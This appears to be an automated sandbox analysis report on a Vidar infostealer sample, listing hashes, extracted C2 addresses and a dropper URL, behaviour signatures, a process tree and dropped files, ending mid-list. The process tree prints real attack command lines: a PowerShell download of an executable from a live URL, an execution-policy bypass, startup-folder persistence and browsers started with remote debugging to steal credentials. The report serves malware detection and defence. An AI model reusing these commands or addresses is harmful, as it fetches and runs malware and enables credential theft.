Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/11/2024, 02:53

General

  • Target

    c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe

  • Size

    1.2MB

  • MD5

    6a97f99224f349c28c6c4c8a3f2ecfb6

  • SHA1

    64c0eac737f4f294e50d64d7ded5896e4d36b2e7

  • SHA256

    c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480

  • SHA512

    370836b122778b34ac8804012781f1b1d274864977a537993b8efba9cc8d7f8b526d7ed9774d65a8311b556133f1c914a4f5d89421c4a4ee181278ddfd4639a0

  • SSDEEP

    24576:0rORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tvaj1h9XCrd:02EYTb8atv1orq+pEiSDTj1VyvBaJSR

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://my.cloudme.com/v1/ws2/:excellent2024/:stars/stars.txt

Extracted

Family

vidar

C2

https://t.me/asg7rd

https://steamcommunity.com/profiles/76561199794498376

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Signatures

  • Detect Vidar Stealer 17 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 60 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3484
      • C:\Users\Admin\AppData\Local\Temp\c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe
        "C:\Users\Admin\AppData\Local\Temp\c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe"
        2⤵
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:excellent2024/:stars_1/stars" -OutFile "C:\Users\Public\Guard.exe""
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2612
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Users\Public\Guard.exe
            "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3968
      • C:\Windows\SysWOW64\cmd.exe
        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
        2⤵
        • Drops startup file
        • System Location Discovery: System Language Discovery
        PID:224
      • C:\Users\Public\jsc.exe
        C:\Users\Public\jsc.exe
        2⤵
        • Executes dropped EXE
        PID:3224
      • C:\Users\Public\jsc.exe
        C:\Users\Public\jsc.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3180
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
            PID:3748
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
              PID:640
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
                PID:1884
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                3⤵
                • Checks computer location settings
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2728
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  4⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:4320
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa20edcc40,0x7ffa20edcc4c,0x7ffa20edcc58
                    5⤵
                      PID:1868
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1892 /prefetch:2
                      5⤵
                        PID:2252
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:3
                        5⤵
                          PID:2036
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2448 /prefetch:8
                          5⤵
                            PID:2392
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:764
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3212 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:3692
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:4288
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4628,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
                            5⤵
                              PID:1908
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4640 /prefetch:8
                              5⤵
                                PID:3732
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4772,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3616 /prefetch:8
                                5⤵
                                  PID:4796
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,4864370754912168005,8885366083795581299,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:8
                                  5⤵
                                    PID:3628
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  4⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  PID:3544
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa20ee46f8,0x7ffa20ee4708,0x7ffa20ee4718
                                    5⤵
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2624
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
                                    5⤵
                                      PID:5004
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1492
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
                                      5⤵
                                        PID:2380
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:4828
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:2504
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:4844
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:5024
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
                                        5⤵
                                          PID:4252
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                                          5⤵
                                            PID:2964
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2632 /prefetch:2
                                            5⤵
                                              PID:3220
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3504 /prefetch:2
                                              5⤵
                                                PID:1996
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2408 /prefetch:2
                                                5⤵
                                                  PID:4200
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15552656029860248221,12165032098405450536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3420 /prefetch:2
                                                  5⤵
                                                    PID:2264
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4760
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 10
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Delays execution with timeout.exe
                                                    PID:3696
                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                            1⤵
                                              PID:4660
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                              1⤵
                                                PID:1988

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\ProgramData\chrome.dll

                                                Filesize

                                                676KB

                                                MD5

                                                eda18948a989176f4eebb175ce806255

                                                SHA1

                                                ff22a3d5f5fb705137f233c36622c79eab995897

                                                SHA256

                                                81a4f37c5495800b7cc46aea6535d9180dadb5c151db6f1fd1968d1cd8c1eeb4

                                                SHA512

                                                160ed9990c37a4753fc0f5111c94414568654afbedc05308308197df2a99594f2d5d8fe511fd2279543a869ed20248e603d88a0b9b8fb119e8e6131b0c52ff85

                                              • C:\ProgramData\mozglue.dll

                                                Filesize

                                                593KB

                                                MD5

                                                c8fd9be83bc728cc04beffafc2907fe9

                                                SHA1

                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                SHA256

                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                SHA512

                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                              • C:\ProgramData\nss3.dll

                                                Filesize

                                                2.0MB

                                                MD5

                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                SHA1

                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                SHA256

                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                SHA512

                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                Filesize

                                                649B

                                                MD5

                                                11db5d3cec46e5bdac3e026ce5e74ad1

                                                SHA1

                                                34d7080793a1cbe756ee89cefbc312bd6d936a32

                                                SHA256

                                                4de33c54a739a6e7ed6bfec909b349e6ec10feab3c3a03f5ea15fb1388134ba7

                                                SHA512

                                                ea87162b714a106931d7e29c3d0ddd56ed92ec47f8209240d807a16dd51466ffbd9bb358a3ad894fe7733cb76cbfe449ae747b8f66188c3e26e33088cd82564e

                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                Filesize

                                                2B

                                                MD5

                                                d751713988987e9331980363e24189ce

                                                SHA1

                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                SHA256

                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                SHA512

                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                2KB

                                                MD5

                                                2f57fde6b33e89a63cf0dfdd6e60a351

                                                SHA1

                                                445bf1b07223a04f8a159581a3d37d630273010f

                                                SHA256

                                                3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                SHA512

                                                42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                Filesize

                                                418B

                                                MD5

                                                3360b5dcb4f3043ed0d74ee5cedb757f

                                                SHA1

                                                e7b523745f7e3ffc12de2324cd35ea3e38a1d216

                                                SHA256

                                                d487ab4d7bf4a1dcf114a0030b330ea4052cc162c8172a31e4519bf2717720da

                                                SHA512

                                                25bc3ee3b02bb36fa1f3ae7e44673b72b738d1147c0dcd000d19ef330865cde009a662251c8817a0b3342b06f123ad8aef48e4c416c725ff3607663732c548b2

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                Filesize

                                                552B

                                                MD5

                                                f192bad2d90b590efd8b8d0e5ced1d23

                                                SHA1

                                                1c8d3fcd54a7799865fd8426b60574c4fb1618ea

                                                SHA256

                                                d91a0a5b5bdd670d98a38c6257b0e66271e9d2419e0b44eda0139940283865ea

                                                SHA512

                                                a77b62447991318340d89ff54e144ce13d2a451d4b196b879ad0b13139afde9691fff5c3c5b5af7ca291e85b442bf5f3648ced1b3129ee2f848bc45e0bdcf3b1

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\122af2ba-977a-4655-9afe-4009d0b9f578.dmp

                                                Filesize

                                                825KB

                                                MD5

                                                36dcc05a186ada3b8014e0fa63a35a88

                                                SHA1

                                                096efc703dcd1517af6732c46c96e551b63ce140

                                                SHA256

                                                dd5ad7fdbb57f70478774f7648e1dd72fc5b4eb4d532997118ff7362a8eb5dfe

                                                SHA512

                                                738d1d62347e23142c77518d0dbaadc5461aa138a4280d6fb043cbf2c22335b1a0ac586c267e5eea7de6ce92d8c11181af01c65ee2a7b61d8460a249022d8fe1

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1dac7434-9768-4196-adf1-be7a2a256ef3.dmp

                                                Filesize

                                                825KB

                                                MD5

                                                f9ba39b441574dd43e4786d2271a597f

                                                SHA1

                                                ef89138038fb089e0bb8c6331b3e65bf32a8790c

                                                SHA256

                                                38750df866795edbc2c08a72c8e15f1d6a5b6135b1a2746127295a7d1bc30c2b

                                                SHA512

                                                41714c5bf12b49836e176d4a67ca34f716b044c3de21d1333b5c902e37c84471a6fe5ab841479a1ef7011e063c64bebf2d1719235adb6fe2bf4efd75ea4693e8

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\490dbaf9-2deb-4a9d-93c6-f607a4b32e1b.dmp

                                                Filesize

